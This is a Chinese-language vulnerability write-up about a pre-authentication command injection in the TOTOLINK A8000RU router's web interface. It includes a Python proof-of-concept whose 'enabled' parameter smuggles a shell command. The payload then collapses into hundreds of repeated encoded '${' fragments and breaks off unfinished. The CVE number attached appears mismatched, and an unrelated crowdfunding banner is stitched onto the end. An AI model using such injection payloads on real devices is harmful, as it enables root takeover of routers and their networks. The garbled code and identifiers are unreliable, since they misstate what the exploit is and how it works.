TOTOLINK A8000RU 预认证命令注入漏洞 (CVE-2020-13938)

漏洞概述 漏洞编号: #801142 漏洞标题: Totolink A8000RU 7.1cu.643_b20200521 Command Injection 漏洞描述: 在TOTOLINK A8000RU 7.1cu.643_b20200521路由器的web管理界面（/cgi-bin/cstecgi.cgi）的“setSyslogCfg”功能中存在一个预认证操作系统命令注入漏洞。CGI处理程序使用HTTP参数“enabled”的用户控制输入，将其嵌入到shell命令字符串中，并通过“system()”执行，没有进行任何清理或转义。因此，远程攻击者可以通过网络访问web界面注入任意shell命令，并在设备上以root权限执行，无需认证。这允许完全妥协路由器，并可能进一步妥协所连接的局域网。 影响范围 受影响设备: TOTOLINK A8000RU 7.1cu.643_b20200521路由器 修复方案 修复状态: 已修复（Moderation: Fixed） 修复时间: 2020年9月26日 10:08 PM POC代码 ```python import requests import sys def exploit(url): 构造payload payload = "enabled=;echo%20%27%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%24%7B%

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

TOTOLINK A8000RU 预认证命令注入漏洞 (CVE-2020-13938)

目标达成感谢每一位支持者 — 我们达成了 100% 目标！